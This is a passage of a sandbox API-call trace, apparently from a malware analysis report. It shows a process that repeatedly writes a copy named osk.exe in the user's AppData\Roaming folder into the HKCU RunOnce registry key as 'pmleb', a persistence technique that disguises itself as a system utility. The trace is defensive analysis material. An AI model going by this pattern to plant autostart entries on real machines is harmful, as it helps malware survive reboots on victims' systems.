HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.269] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.269] RegCloseKey (hKey=0x280) returned 0x0 [0081.269] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.269] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.270] SetTimer (hWnd=0x20280, nIDEvent=0x20a7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a7 [0081.270] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.281] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.282] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.282] KillTimer (hWnd=0x20280, uIDEvent=0x20a7) returned 1 [0081.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.282] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.282] IUnknown:Release (This=0x787518) returned 0x1 [0081.282] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.282] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.282] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.283] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.283] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.283] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0081.283] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.283] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2d [0081.283] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.284] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2c [0081.284] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.284] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.284] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.284] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.284] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0081.284] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.284] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.284] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.285] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.285] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.285] RegCloseKey (hKey=0x280) returned 0x0 [0081.285] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.285] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.285] SetTimer (hWnd=0x20280, nIDEvent=0x20a8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a8 [0081.285] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.297] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.297] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.297] KillTimer (hWnd=0x20280, uIDEvent=0x20a8) returned 1 [0081.297] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.297] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.298] IUnknown:Release (This=0x787518) returned 0x1 [0081.298] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.298] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.298] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.298] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.298] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.298] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0081.298] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.298] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2e [0081.298] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.299] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2d [0081.299] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.299] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.299] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.299] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.299] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.299] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 
lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.300] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.300] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.300] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.300] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") 
returned 0x0 [0081.300] RegCloseKey (hKey=0x280) returned 0x0 [0081.300] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.300] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.300] SetTimer (hWnd=0x20280, nIDEvent=0x20a9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20a9 [0081.300] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.313] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.313] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.313] KillTimer (hWnd=0x20280, uIDEvent=0x20a9) returned 1 [0081.313] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.313] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.313] IUnknown:Release (This=0x787518) returned 0x1 [0081.313] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.313] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.313] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), 
rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.314] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.314] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.314] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e 
[0081.314] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.314] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x2f [0081.314] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.315] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x2e [0081.315] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.315] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.315] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.315] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.315] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.315] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 
lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.315] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.315] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 